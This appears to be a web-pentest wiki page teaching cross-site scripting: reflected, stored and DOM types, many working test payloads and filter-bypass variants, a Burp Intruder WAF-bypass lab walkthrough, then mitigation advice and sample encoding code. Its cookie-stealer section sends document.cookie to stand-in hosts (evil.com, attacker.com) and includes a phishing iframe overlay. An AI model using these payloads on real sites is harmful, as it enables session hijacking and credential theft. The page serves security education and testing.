XSS Attack - ties2/web-pentest GitHub Wiki
Cross-site scripting (XSS) is a type of security vulnerability commonly found in web applications. It allows an attacker to inject malicious code into a web page that is viewed by other users. This can lead to the theft of sensitive information, such as login credentials, session tokens, and other personal data. In this article, we will discuss the different types of XSS attacks and how they can be prevented.
- Reflected
- Stored
- Blind
- DOM-based
- Self-XSS
Reflected XSS, also known as non-persistent XSS, is the most common type of XSS attack. It occurs when an attacker injects malicious code into a web page that is then reflected back to the user. This usually happens when the user submits a form or enters data into a search box. The injected code is included in the response from the server, and it is executed by the victim's browser.
For example, imagine a website that has a search box where users can search for products. If an attacker enters a malicious script into the search box, such as `<script>alert('XSS');</script>`, and submits the form, the script will be reflected back to the user and executed in their browser.
Other payloads to test:

```
<script>alert(1)</script>
<Script>alert(1)</Script>
<SC<script>ript>alert(1)</SC</script>ript>
<img src=x onerror=alert(document.domain)>
"";alert(1)//";
';alert(1)//
"type="hidden"><script>alert(1)</script><input"
'type="hidden"><script>alert(1)</script><input'
"}';alert(1); //
?input=</title><script>alert(1)</script><title>
;</style><script>alert(1)</script> //
```
Source:

```html
<style>
.body{
    color: #fff;
}
</style>
```
Example 1:
payload:

```
"onmouseover="alert(1)
```

source:

Example 2:
payload:

```
'-alert(1)-'
```

source:

```javascript
var searchTerms = ''-alert(1)-'';
```
Example 3: (bypass a WAF blocklist using Burp Suite Intruder)

- In Burp Intruder, in the Positions tab, replace the value of the search term with: `<>`. Place the cursor between the angle brackets and click "Add §" twice, to create a payload position. The value of the search term should now look like: `<§§>`.
- Visit the XSS cheat sheet and click "Copy tags to clipboard".
- In Burp Intruder, in the Payloads tab, click "Paste" to paste the list of tags into the payloads list. Click "Start attack".
- When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response, except for the `body` payload, which caused a 200 response.
- Go back to the Positions tab in Burp Intruder and replace your search term with: `<body%20=1>`. Place the cursor before the `=` character and click "Add §" twice, to create a payload position. The value of the search term should now look like: `<body%20§§=1>`.
- Visit the XSS cheat sheet and click "Copy events to clipboard".
- In Burp Intruder, in the Payloads tab, click "Clear" to remove the previous payloads. Then click "Paste" to paste the list of attributes into the payloads list. Click "Start attack".
- When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response, except for the `onresize` payload, which caused a 200 response.
- Go to the exploit server and paste the following code, replacing YOUR-LAB-ID with your lab ID:

```html
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
```

- Click "Store" and "Deliver exploit to victim".

Stored XSS, also known as persistent XSS, is a type of XSS attack where an attacker injects malicious code into a web page that is then stored on the server and served to other users. This can happen when an attacker is able to upload malicious content to a website, such as a comment or a forum post. The injected code is included in the response from the server, and it is executed by any user who views the page.
For example, imagine a website that allows users to post comments on articles. If an attacker is able to inject a malicious script into a comment, such as `<script>alert('XSS');</script>`, it will be stored on the server and served to other users who view the article.
DOM-based XSS is a type of XSS attack where the injection of malicious code is reflected in the DOM (Document Object Model) of the page. This can happen when a website uses client-side scripting to manipulate the DOM, such as JavaScript. Unlike the other types of XSS attacks, the payload is not sent to the server. Instead, the attack occurs entirely on the client-side.
For example, imagine a website that allows users to enter their name and displays it on the page using JavaScript. If an attacker is able to inject a malicious script into the name field, such as `<script>alert('XSS');</script>`, it will be executed by the browser's DOM and cause a pop-up alert to appear.
Note: when the value you enter appears on the page immediately, check whether the data is actually sent to the server or not.
You should check the DOM in the browser's inspector.
Example 1:

```
<img src=c onerror=alert(1)>
```

or

```
"; alert(1);//
```
Source code (`eval` executes the concatenated string as JavaScript, so a `"` in the field value breaks out of the string literal):

```html
<script>
function updateOutput(){
    const output = document.getElementById('output');
    const output_box = document.getElementById('output-box');
    // Sink: the untrusted field value is concatenated into code and evaluated
    eval('var field_value= "' + document.getElementById('fullname').value + '"')
    if(field_value !== ""){
        output.innerHTML = field_value + ' you enrolled'
        output_box.classList.add('show');
    }
    else{
        output_box.classList.remove('show');
    }
}
</script>
```
Example 2:
payload:

```
">
```

source:

```html
<script>
function trackSearch(query) {
    document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
    trackSearch(query);
}
</script>
```
Example 3:
payload:
source:

```html
<script>
function doSearchQuery(query) {
    document.getElementById('searchMessage').innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
    doSearchQuery(query);
}
</script>
```

Example 4:
payload:
source:

```html
<script>
$(function() {
    $('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
});
</script>
```
Example 5:

```
javascript:alert(document.cookie)
```

Example 6:

```
<iframe src="https://attacker-server/#" onload="this.src+='
```

Example 7:
payload: (add the storeId parameter to the URL)

```
product?productId=1&storeId="><img%20src=1%20onerror=alert(1)>
```

source (the markup inside the `document.write` strings did not survive copying; the sink is `document.write` with the unencoded `storeId` value):

```html
<script>
var stores = ["London","Paris","Milan"];
var store = (new URLSearchParams(window.location.search)).get('storeId');
document.write('');
if(store) {
    document.write(''+store+'');
}
for(var i=0;i<stores.length;i++) {
    if(stores[i] === store) {
        continue;
    }
    document.write(''+stores[i]+'');
}
</script>
```
Example 8: (DOM XSS in an AngularJS expression)
payload:

```
{{$on.constructor('alert(1)')()}}
```

source:

Example 9: (reflected DOM XSS)
payload:

```
"-alert(1)}//
```

source:

```javascript
document.location = "javascript:alert(1)"
window.location = "javascript:alert(1)"
location.href = "javascript:alert(1)"
document.location.replace("javascript:alert(1)")
window.location.replace("javascript:alert(1)")
```
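An added example, not code from this wiki, of the defensive check that belongs in front of the navigation sinks listed above and the `returnPath` href sink of example 4: `safeReturnPath` and `FALLBACK` are assumed names; the value is parsed with the WHATWG `URL` API and only same-origin `http`/`https` targets are allowed through.

```javascript
// Added example (not from the wiki). Assumed names: safeReturnPath, FALLBACK.
const FALLBACK = "/";
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// input: the untrusted value (e.g. the returnPath query parameter).
// base:  the page's own URL, e.g. document.location.href in a browser.
// Returns a relative same-origin path, or FALLBACK when the input is
// unparsable, uses a scripting/data scheme, or points to another origin.
function safeReturnPath(input, base) {
  if (typeof input !== "string" || input.length === 0) return FALLBACK;
  let url;
  try {
    // The URL parser strips leading control characters and lowercases the
    // scheme, so "\tJaVaScRiPt:" is normalised to "javascript:" before the
    // allow-list check runs; no manual string matching is needed.
    url = new URL(input, base);
  } catch (e) {
    return FALLBACK;
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return FALLBACK; // javascript:, data:, ...
  if (url.origin !== new URL(base).origin) return FALLBACK;  // //other-host/... etc.
  return url.pathname + url.search + url.hash;
}
```

The sanitised value can then be assigned to `location.href` or set as an `href` attribute without the `javascript:` payloads above ever reaching the sink.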
Imaginary CookieStealer URL:

```
http://evil.com/cookie.php?txt=
```

Payload 1:

```html
<button onclick=window.location='http://evil.com/cookie.php?txt='+document.cookie>Your Whatsapp Chat Backup Download</button>
```

Payload 2:

```html
<script>window.location='http://evil.com/cookie.php?txt='+document.cookie;</script>
```

Payload 3:

```html
<img src=ggg onerror=this.src='http://evil.com/cookie.php?txt='+document.cookie>
```

Payload 4:

```html
<img src=ggg style="display:none;" onerror="this.src='http://evil.com/cookie.php?txt='+document.cookie; this.removeAttribute('onerror');">
```

```html
<iframe src=http://evil.com/login.html style="position:fixed; top:0; left:0; right:0; width:100%; height:100%;">
```

Use input validation and sanitization to prevent malicious scripts from being injected into web pages. Also, use Content Security Policy (CSP) to restrict the sources of scripts and enforce safe inline scripts.
Input Validation
The best way to prevent XSS attacks is to validate all user input. This means checking all data entered into forms, search boxes, and other input fields for malicious content. If any malicious content is found, it should be removed before the data is stored or displayed on the page.
Output Encoding
Another way to prevent XSS attacks is to encode all output. This means converting any special characters, such as `<` and `>`, into their HTML entities, such as `&lt;` and `&gt;`. This prevents the browser from interpreting the characters as code and executing it.
Content Security Policy
Content Security Policy (CSP) is a security feature that allows website owners to specify which sources of content are allowed to be loaded on their pages. This can prevent XSS attacks by blocking any external scripts or other content that is not explicitly allowed.
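An added example, not code from this wiki, of the output encoding described above applied per context: `encodeForHtml` neutralises the reflected payloads shown earlier (`<script>alert(1)</script>`, `"onmouseover="alert(1)`), `encodeForJsString` covers the `var searchTerms = '...'` context of reflected example 2, and `renderSearchPage` is an assumed helper that builds the search response with the right encoder for each sink.

```javascript
// Added example (not from the wiki). Assumed helper names:
// encodeForHtml, encodeForJsString, renderSearchPage.

// HTML body and quoted-attribute context: escape the five characters that
// can change how the markup is parsed. Both ' and " are escaped so the
// result is also safe inside a single- or double-quoted attribute value.
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// JavaScript string-literal context: \uXXXX-escape every non-alphanumeric
// UTF-16 code unit, so quotes, backslashes, line terminators and </script>
// can never terminate the literal or the enclosing <script> element.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).toUpperCase().padStart(4, "0"));
}

// Rebuilds the sinks from the reflected examples (heading text, input value
// attribute, inline script variable) with the encoder matching each context.
function renderSearchPage(term) {
  return [
    "<h1>0 search results for '" + encodeForHtml(term) + "'</h1>",
    "<input type=\"text\" name=\"search\" value=\"" + encodeForHtml(term) + "\">",
    "<script>var searchTerms = '" + encodeForJsString(term) + "';</script>",
  ].join("\n");
}
```

Encoding is chosen by where the value lands, not by what it contains: the same term needs different escaping in the heading, the attribute and the script block.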
- Payload: `<script>alert('XSS');</script>` Vector: Input fields that reflect user input, such as search boxes and forms.
- Payload: `<script>alert('XSS');</script>` Vector: Input fields that store user-generated content, such as comment sections and forum posts.
- Payload: `<script>alert('XSS');</script>` Vector: Client-side scripts that manipulate the DOM, such as JavaScript.
- Payload: `<script>new Image().src="http://attacker.com/?cookie="+document.cookie;</script>` Vector: Input fields that may contain sensitive information, such as login forms.
- Payload: `';alert('XSS');//` Vector: Input fields that execute user input as code, such as SQL queries and command prompts.
- Input Validation: Validate user input to remove or reject any malicious content.
- Output Encoding: Encode any user-generated content to prevent it from being interpreted as code.
- Content Security Policy: Implement a CSP to specify which sources of content are allowed to be loaded on the page.
- Sanitization Libraries: Use sanitization libraries to automatically remove or neutralize any malicious code from user input.
- Perform unauthorized activities
- Use the clickjacking technique
https://github.com/Quitten/XSSor
https://github.com/TheWation/WebSecurityVision
https://github.com/payloadbox/xss-payload-list
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
Conclusion
XSS attacks are a serious security threat that can lead to the theft of sensitive information and other malicious activities. By understanding the different types of XSS attacks and implementing best practices for preventing them, website owners can help protect their users and their data.